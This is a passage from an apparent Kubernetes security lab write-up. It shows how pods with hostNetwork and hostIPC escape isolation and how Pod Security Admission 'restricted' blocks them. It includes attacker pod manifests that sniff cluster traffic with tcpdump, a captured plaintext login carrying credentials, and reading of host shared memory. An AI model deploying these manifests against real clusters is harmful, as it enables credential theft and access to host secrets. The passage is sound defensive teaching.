  name: attacker
  namespace: vuln-psa-ns
spec:
  hostNetwork: true
  containers:
  - name: attacker
    image: ubuntu
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y tcpdump; tcpdump -i cni0 -A -s 0 'tcp port 8080'" ]
  nodeName: worker
And we successfully capture:
..(.)Ik.POST / HTTP/1.1
Host: victim1:8080
User-Agent: curl/8.5.0
Accept: */*
Content-Type: application/json
Content-Length: 46
{ "admin":"admin", "password":"Sup3r_S3cr3t" }
Traffic inside the cluster usually isn't encrypted (no TLS), so we can capture this kind of information by sniffing
We can also access services that listen on the host (node) interfaces. For example, I run a Python server on the node, and a pod with hostNetwork enabled can reach it:
root@worker:/# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:31337 0.0.0.0:* LISTEN -
As in the previous example, if we enable PSA with pod-security.kubernetes.io/enforce: restricted, the pod is rejected
hostIPC
This doesn't work against other pods: if you create something in /dev/shm inside another pod and try to read it from the attacker pod, it won't be there. Only files and other objects created on the real host are visible.
attacker.yml
apiVersion: v1
kind: Pod
metadata:
  name: attacker
  namespace: vuln-psa-ns
spec:
  hostIPC: true
  containers:
  - name: attacker
    image: ubuntu
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "sleep 99999" ]
  nodeName: worker
On the host we put something into /dev/shm/secretfile, and now we can access it from the created pod
hostPath
privileged
All Links / Resources
Papers extracted from the proceedings of the Ottawa Linux Symposium